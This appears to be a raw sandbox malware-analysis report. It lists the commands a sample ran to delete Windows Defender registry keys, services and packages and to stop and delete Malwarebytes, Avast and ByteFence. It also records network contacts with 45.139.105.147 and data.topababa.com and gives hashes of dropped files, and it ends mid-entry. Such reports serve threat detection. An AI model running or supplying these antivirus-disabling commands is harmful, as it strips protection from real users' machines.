C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc stop LicenseManager
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc config LicenseManager start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc stop DiagTrack
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\sc.exe
sc config DiagTrack start= disabled
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-CloudClean-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\taskkill.exe
taskkill /f /im smartscreen.exe
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\taskkill.exe
taskkill /f /im SecurityHealthService.exe
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-MDM-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Nis-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~10.0.19041.1165\Owners" /f
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Windows\system32\taskkill.exe
taskkill /f /im MpCopyAccelerator.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im MpCopyAccelerator.exe
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\dismhost.exe {CBEFE7D5-AAD4-4690-B2B0-AF21129BA3E1}
C:\Windows\System32\taskkill.exe
taskkill /f /im SecurityHealthService.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im SystemSettings.exe
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Security Health" /f
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Windows\system32\reg.exe
reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdBoot" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisDrv" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SecurityHealth /f
C:\Windows\system32\sc.exe
sc delete windefend
C:\Windows\system32\sc.exe
sc delete sense
C:\Users\Admin\AppData\Local\Temp\95411DA1-83B1-40E8-8D4E-9E8B9CBE46A6\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\95411DA1-83B1-40E8-8D4E-9E8B9CBE46A6\dismhost.exe {A1544C08-9553-46F9-9A9D-12E39A1C3321}
C:\Windows\system32\sc.exe
sc stop nsWscSvc
C:\Windows\system32\taskkill.exe
taskkill /f /im MBAMWsc.exe
C:\Windows\system32\sc.exe
sc stop MBAMService
C:\Windows\system32\sc.exe
sc config MBAMService start= disabled
C:\Windows\system32\sc.exe
sc delete MBAMService
C:\Windows\system32\taskkill.exe
taskkill /f /im MBAM.exe
C:\Windows\system32\sc.exe
sc stop Bytefenceservice
C:\Windows\system32\sc.exe
sc config Bytefenceservice start= disabled
C:\Windows\system32\sc.exe
sc delete Bytefenceservice
C:\Windows\system32\taskkill.exe
taskkill /f /im Bytefence.exe
C:\Windows\system32\sc.exe
sc stop "avast! Tools"
C:\Windows\system32\sc.exe
sc config "avast! Tools" start= disabled
C:\Windows\system32\sc.exe
sc delete "avast! Tools"
C:\Windows\system32\sc.exe
sc stop "avast! Antivirus"
C:\Windows\system32\sc.exe
sc config "avast! Antivirus" start= disabled
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\D5BCAA8F-95AB-4136-93CA-BF3BD734ABD1\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\D5BCAA8F-95AB-4136-93CA-BF3BD734ABD1\dismhost.exe {815AD444-1366-4881-B12F-E14CD742E20B}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\CB619811-B681-407B-8F85-7CB48683D048\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\CB619811-B681-407B-8F85-7CB48683D048\dismhost.exe {DF90B283-EFA6-4166-BB4E-D43D4EA2D9DF}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\E90A543E-89ED-4D12-B4B5-46AE93ECA01F\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\E90A543E-89ED-4D12-B4B5-46AE93ECA01F\dismhost.exe {3543CB19-FEDE-478B-9C3C-166053DA79FB}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\1114080B-0ACB-4CBF-A5F0-6926D5353D27\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\1114080B-0ACB-4CBF-A5F0-6926D5353D27\dismhost.exe {E3A2CD6D-517B-47FD-B2BA-3896B12EFFF2}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\B1079C10-7F64-4C74-8FBC-D4B3E7AFDF3A\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\B1079C10-7F64-4C74-8FBC-D4B3E7AFDF3A\dismhost.exe {FE8E9E8D-810A-460A-AC15-53FA323A2AE8}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\A8869433-AABD-4A6B-9057-28080F600D5F\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\A8869433-AABD-4A6B-9057-28080F600D5F\dismhost.exe {D5BEC425-AC5D-45A9-AEB4-44383F4F5F87}
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT" /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender" /f
Network
| Country | Destination | Domain | Proto |
| N/A | 45.139.105.147:5200 | tcp | |
| N/A | 45.139.105.147:1234 | tcp | |
| N/A | 8.8.8.8:53 | data.topababa.com | udp |
| N/A | 84.53.175.11:80 | tcp | |
| N/A | 84.53.175.11:80 | tcp | |
| N/A | 84.53.175.11:80 | tcp | |
| N/A | 104.80.225.205:443 | tcp | |
| N/A | 45.139.105.147:1234 | tcp | |
| N/A | 51.104.15.252:443 | tcp | |
| N/A | 45.139.105.147:5200 | tcp | |
| N/A | 93.184.221.240:80 | tcp | |
| N/A | 93.184.221.240:80 | tcp | |
| N/A | 93.184.221.240:80 | tcp | |
| N/A | 8.8.8.8:53 | data.topababa.com | udp |
| N/A | 45.139.105.147:5200 | tcp | |
| N/A | 45.139.105.147:1234 | tcp | |
| N/A | 8.8.8.8:53 | data.topababa.com | udp |
| N/A | 45.139.105.147:5200 | tcp | |
| N/A | 45.139.105.147:1234 | tcp | |
| N/A | 8.8.8.8:53 | data.topababa.com | udp |
| N/A | 45.139.105.147:5200 | tcp | |
| N/A | 45.139.105.147:5200 | tcp | |
| N/A | 45.139.105.147:1234 | tcp | |
| N/A | 8.8.8.8:53 | data.topababa.com | udp |
Files
C:\Program Files\Microsoft.exe
| MD5 | 5cf52aea15ebdef8a216f5a3d4f44c73 |
| SHA1 | b7394c7347b84db2d878e9deb260862d51023dd4 |
| SHA256 | 479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078 |
| SHA512 | 230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b |
memory/1432-132-0x0000000000000000-mapping.dmp
C:\Program Files\Microsoft.exe
| MD5 | 5cf52aea15ebdef8a216f5a3d4f44c73 |
| SHA1 | b7394c7347b84db2d878e9deb260862d51023dd4 |
| SHA256 | 479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078 |
| SHA512 | 230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b |
memory/4288-135-0x0000000000000000-mapping.dmp
C:\Program Files\Builded.exe
| MD5 | 361356a7a0a38b3080b298ff8f3b8c9d |
| SHA1 | 1763fa71f4cd842a84600b47ee9b436c417f5c1f |
| SHA256 | b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a |
| SHA512 | 0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8 |
memory/4288-137-0x0000000000400000-0x000000000043D000-memory.dmp
C:\Program Files\Builded.exe
| MD5 | 361356a7a0a38b3080b298ff8f3b8c9d |
| SHA1 | 1763fa71f4cd842a84600b47ee9b436c417f5c1f |
| SHA256 | b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a |
| SHA512 | 0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8 |
memory/2168-139-0x0000000000000000-mapping.dmp
C:\Program Files\installerX32.exe
| MD5 | c27bdf2ff2a21ec02ed912e7fac3477c |
| SHA1 | 5ad38698e859a7853f7bab46c02efd03144fef36 |
| SHA256 | 3de84b141dd53e7550330c170ff77740ee3ae763cba82a07b8d0e6e1dfd5f51c |
| SHA512 | 1d850f735225fcff71198a6360b813563652a75fb0eb458ad1e071c10efb9c3de80505334e75c665827601bd5d19bcf711cb0d6e365d1b8bd7bf7dec26c5a8d1 |
C:\Program Files\installerX32.exe
| MD5 | c27bdf2ff2a21ec02ed912e7fac3477c |
| SHA1 | 5ad38698e859a7853f7bab46c02efd03144fef36 |
| SHA256 | 3de84b141dd53e7550330c170ff77740ee3ae763cba82a07b8d0e6e1dfd5f51c |
| SHA512 | 1d850f735225fcff71198a6360b813563652a75fb0eb458ad1e071c10efb9c3de80505334e75c665827601bd5d19bcf711cb0d6e365d1b8bd7bf7dec26c5a8d1 |
memory/1868-142-0x0000000000000000-mapping.dmp
C:\Program Files\InstallerX64.exe
| MD5 | cc3db2432720f58955baa76ab4708a18 |
| SHA1 | 256923ae3d9888262be5c548b553182c4400674a |
| SHA256 | 023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096 |
| SHA512 | ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82 |
C:\Program Files\InstallerX64.exe
| MD5 | cc3db2432720f58955baa76ab4708a18 |
| SHA1 | 256923ae3d9888262be5c548b553182c4400674a |
| SHA256 | 023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096 |
| SHA512 | ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82 |
memory/3456-145-0x0000000000000000-mapping.dmp
C:\Program Files\Microsoft office.exe
| MD5 | 2bc19dd96b42cea3280eb5fe1e949b82 |
| SHA1 | d4daeaa890659239a848d36b34e1c5b0d150c42f |
| SHA256 | 6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205 |
| SHA512 | e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b |
C:\Program Files\Microsoft office.exe
| MD5 | 2bc19dd96b42cea3280eb5fe1e949b82 |
| SHA1 | d4daeaa890659239a848d36b34e1c5b0d150c42f |
| SHA256 | 6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205 |
| SHA512 | e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b |
memory/3456-148-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/2396-149-0x0000000000000000-mapping.dmp
memory/4952-150-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\8523.tmp\8524.tmp\8534.bat
| MD5 | a9364ef8f38cb959002706b2cc5ca9b4 |
| SHA1 | 4fbfdd5dbab4c63cdae4876c16f09d0e2d83152a |
| SHA256 | 6eba0633df1319abc32f0a5e5464449b2648db207c7176d0e553dc9fe50f5b27 |
| SHA512 | a3496fc402264166470f9be89712eeff3f1ec7d8fde3d0bb4805d852dd6f4a426d5695895831faa53411d1d73fdcf24a8c6303a8898926f6af66a7589e32d4f3 |
memory/4540-152-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\8524.tmp\8533.tmp\8534.bat
| MD5 | 3c92f725b696f48b1ae5386c6b88147d |
| SHA1 | 7d80fab21ff225acdefbe3c33e11d57dbd58244b |
| SHA256 | 50b7883ad90bcf0b20671b7f0de20d11e4dd88aa2d17cc36b0b0171ca9e800d2 |
| SHA512 | ceedc8835db458884cd49918981965610e2804e0dc42d2ae6eb3aa4c5c281b684978fa73a934faf513184a40fd6b8db8909e90ad86ee152cb63990a87f9c5d03 |
memory/1276-154-0x0000000000000000-mapping.dmp
memory/3892-155-0x0000000000000000-mapping.dmp
memory/4196-156-0x0000000000000000-mapping.dmp
memory/4456-157-0x0000000000000000-mapping.dmp
memory/1872-158-0x0000000000000000-mapping.dmp
memory/2276-159-0x0000000000000000-mapping.dmp
memory/2248-160-0x0000000000000000-mapping.dmp
memory/3500-161-0x0000000000000000-mapping.dmp
memory/3008-162-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\getadmin.vbs
| MD5 | 190aaabd7463fb8aa646211d9ef96446 |
| SHA1 | c7a7a327a45c2367dca3df94f2f00f063ec42326 |
| SHA256 | 20c13146b8a67613aa89ad61e5ac2fdce3c8cbf3ec0b1d33bfdd1093537ce62f |
| SHA512 | 405ad763120a26aeaea1794e512fb7f4383434a837f54160ae3fac2d64bb6d19f5a7fc50b662d62d15719c4771ed999b8bcefb56d078a9c61a2ed2f2ea183021 |
memory/1292-164-0x0000000000000000-mapping.dmp
memory/3364-165-0x0000000000000000-mapping.dmp
memory/3292-166-0x0000000000000000-mapping.dmp
memory/1312-167-0x0000000000000000-mapping.dmp
C:\Program Files\InstallerX64.exe
| MD5 | cc3db2432720f58955baa76ab4708a18 |
| SHA1 | 256923ae3d9888262be5c548b553182c4400674a |
| SHA256 | 023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096 |
| SHA512 | ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82 |
memory/1044-169-0x0000000000000000-mapping.dmp
memory/4512-170-0x0000000000000000-mapping.dmp
memory/4644-171-0x0000000000000000-mapping.dmp
memory/3392-172-0x0000000000000000-mapping.dmp
memory/3556-173-0x0000000000000000-mapping.dmp
memory/4876-174-0x0000000000000000-mapping.dmp
memory/4956-175-0x0000000000000000-mapping.dmp
memory/4960-176-0x0000000000000000-mapping.dmp
memory/4836-177-0x0000000000000000-mapping.dmp
memory/1376-178-0x0000000000000000-mapping.dmp
memory/3944-179-0x0000000000000000-mapping.dmp
memory/3696-180-0x0000000000000000-mapping.dmp
memory/4132-181-0x0000000000000000-mapping.dmp
memory/3852-182-0x0000000000000000-mapping.dmp
memory/3208-183-0x0000000000000000-mapping.dmp
memory/844-184-0x0000000000000000-mapping.dmp
memory/3488-185-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\89D6.tmp\89D7.tmp\89D8.bat
| MD5 | a9364ef8f38cb959002706b2cc5ca9b4 |
| SHA1 | 4fbfdd5dbab4c63cdae4876c16f09d0e2d83152a |
| SHA256 | 6eba0633df1319abc32f0a5e5464449b2648db207c7176d0e553dc9fe50f5b27 |
| SHA512 | a3496fc402264166470f9be89712eeff3f1ec7d8fde3d0bb4805d852dd6f4a426d5695895831faa53411d1d73fdcf24a8c6303a8898926f6af66a7589e32d4f3 |
memory/2288-187-0x0000000000000000-mapping.dmp
memory/3996-188-0x0000000000000000-mapping.dmp
memory/1368-189-0x0000000000000000-mapping.dmp
memory/2972-190-0x0000000000000000-mapping.dmp
memory/4140-192-0x0000000000000000-mapping.dmp
memory/2076-191-0x0000000000000000-mapping.dmp
memory/4612-193-0x0000000000000000-mapping.dmp
memory/2440-194-0x0000000000000000-mapping.dmp
memory/2280-195-0x0000000000000000-mapping.dmp
memory/4148-196-0x0000000000000000-mapping.dmp
memory/4308-197-0x0000000000000000-mapping.dmp
memory/4084-198-0x0000000000000000-mapping.dmp
memory/5088-199-0x0000000000000000-mapping.dmp
memory/4052-200-0x0000000000000000-mapping.dmp
memory/1048-201-0x0000000000000000-mapping.dmp
memory/4312-202-0x0000000000000000-mapping.dmp
memory/4752-203-0x0000000000000000-mapping.dmp
memory/1500-204-0x0000000000000000-mapping.dmp
memory/536-205-0x0000000000000000-mapping.dmp
memory/3424-206-0x0000000000000000-mapping.dmp
memory/1404-207-0x0000000000000000-mapping.dmp
memory/4624-208-0x0000000000000000-mapping.dmp
memory/3624-209-0x0000000000000000-mapping.dmp
memory/4860-210-0x0000000000000000-mapping.dmp
memory/3136-212-0x0000000000000000-mapping.dmp
memory/4748-211-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\DismHost.exe
| MD5 | e5d5e9c1f65b8ec7aa5b7f1b1acdd731 |
| SHA1 | dbb14dcda6502ab1d23a7c77d405dafbcbeb439e |
| SHA256 | e30508e2088bc16b2a84233ced64995f738deaef2366ac6c86b35c93bbcd9d80 |
| SHA512 | 7cf80d4a16c5dbbf61fcb22ebe30cf78ca42a030b7d7b4ad017f28fba2c9b111e8cf5b3064621453a44869bbaed124d6fb1e8d2c8fe8202f1e47579d874fa4bc |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\DismCorePS.dll
| MD5 | a033f16836d6f8acbe3b27b614b51453 |
| SHA1 | 716297072897aea3ec985640793d2cdcbf996cf9 |
| SHA256 | e3b3a4c9c6403cb8b0aa12d34915b67e4eaa5bb911e102cf77033aa315d66a1e |
| SHA512 | ad5b641d93ad35b3c7a3b56cdf576750d1ad4c63e2a16006739888f0702280cad57dd0a6553ef426111c04ceafd6d1e87f6e7486a171fff77f243311aee83871 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\DismCorePS.dll
| MD5 | a033f16836d6f8acbe3b27b614b51453 |
| SHA1 | 716297072897aea3ec985640793d2cdcbf996cf9 |
| SHA256 | e3b3a4c9c6403cb8b0aa12d34915b67e4eaa5bb911e102cf77033aa315d66a1e |
| SHA512 | ad5b641d93ad35b3c7a3b56cdf576750d1ad4c63e2a16006739888f0702280cad57dd0a6553ef426111c04ceafd6d1e87f6e7486a171fff77f243311aee83871 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\DismProv.dll
| MD5 | 490be3119ea17fa29329e77b7e416e80 |
| SHA1 | c71191c3415c98b7d9c9bbcf1005ce6a813221da |
| SHA256 | ef1e263e1bcc05d9538cb9469dd7dba5093956aa325479c3d2607168cc1c000a |
| SHA512 | 6339b030008b7d009d36abf0f9595da9b793264ebdce156d4a330d095a5d7602ba074075ea05fef3dde474fc1d8e778480429de308c121df0bf3075177f26f13 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\dismprov.dll
| MD5 | 490be3119ea17fa29329e77b7e416e80 |
| SHA1 | c71191c3415c98b7d9c9bbcf1005ce6a813221da |
| SHA256 | ef1e263e1bcc05d9538cb9469dd7dba5093956aa325479c3d2607168cc1c000a |
| SHA512 | 6339b030008b7d009d36abf0f9595da9b793264ebdce156d4a330d095a5d7602ba074075ea05fef3dde474fc1d8e778480429de308c121df0bf3075177f26f13 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\OSProvider.dll
| MD5 | db4c3a07a1d3a45af53a4cf44ed550ad |
| SHA1 | 5dea737faadf0422c94f8f50e9588033d53d13b3 |
| SHA256 | 2165d567aa47264abe2a866bb1bcb01a1455a75a6ea530b1b9a4dda54d08f758 |
| SHA512 | 5182b80459447f3c1fb63b70ad0370e1da26828a7f73083bec0af875b37888dd12ec5a6d9dc84157fc5b535f473ad7019eb6a53b9a47a2e64e6a8b7fae4cddde |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\OSProvider.dll
| MD5 | db4c3a07a1d3a45af53a4cf44ed550ad |
| SHA1 | 5dea737faadf0422c94f8f50e9588033d53d13b3 |
| SHA256 | 2165d567aa47264abe2a866bb1bcb01a1455a75a6ea530b1b9a4dda54d08f758 |
| SHA512 | 5182b80459447f3c1fb63b70ad0370e1da26828a7f73083bec0af875b37888dd12ec5a6d9dc84157fc5b535f473ad7019eb6a53b9a47a2e64e6a8b7fae4cddde |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\LogProvider.dll
| MD5 | 815a4e7a7342224a239232f2c788d7c0 |
| SHA1 | 430b7526d864cfbd727b75738197230d148de21a |
| SHA256 | a9c8787c79a952779eca82e7389cf5bbde7556e4491b8bfcfd6617740ac7d8a2 |
| SHA512 | 0c19d1e388ed0855a660135dec7a5e6b72ecbb7eb67ff94000f2399bd07df431be538055a61cfb2937319a0ce060898bb9b6996765117b5acda8fc0bad47a349 |
C:\Windows\Logs\DISM\dism.log
| MD5 | 7016bce88b7708cdc8384174026219d8 |
| SHA1 | 789019515f877981a827d30146cd5ff0ddf87216 |
| SHA256 | 542a3f326a465532fe49867072676869312fe1835c2c590d027418e8fdabebc8 |
| SHA512 | 0af652bd1addcec715de68abfb4432be98a8ecfe3a348588e84719b4cb327bb42a2ff81c1ef3edfc19d40877f2c662d5d121828f6990ea539e8b928d41f377a0 |
memory/4148-220-0x0000000000FF0000-0x0000000000FF1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\LogProvider.dll
| MD5 | 815a4e7a7342224a239232f2c788d7c0 |
| SHA1 | 430b7526d864cfbd727b75738197230d148de21a |
| SHA256 | a9c8787c79a952779eca82e7389cf5bbde7556e4491b8bfcfd6617740ac7d8a2 |
| SHA512 | 0c19d1e388ed0855a660135dec7a5e6b72ecbb7eb67ff94000f2399bd07df431be538055a61cfb2937319a0ce060898bb9b6996765117b5acda8fc0bad47a349 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\CbsProvider.dll
| MD5 | 6ad0376a375e747e66f29fb7877da7d0 |
| SHA1 | a0de5966453ff2c899f00f165bbff50214b5ea39 |
| SHA256 | 4c9a4ab6596626482dd2190034fcb3fafebe88a961423962ad577e873ef5008f |
| SHA512 | 8a97b2cc96ec975188e53e428d0fc2c562f4c3493d3c354e316c7f89a0bd25c84246807c9977f0afdda3291b8c23d518a36fd967d8f9d4d2ce7b0af11b96eb18 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\AppxProvider.dll
| MD5 | a7927846f2bd5e6ab6159fbe762990b1 |
| SHA1 | 8e3b40c0783cc88765bbc02ccc781960e4592f3f |
| SHA256 | 913f97dd219eeb7d5f7534361037fe1ecc3a637eb48d67b1c8afa8b5f951ba2f |
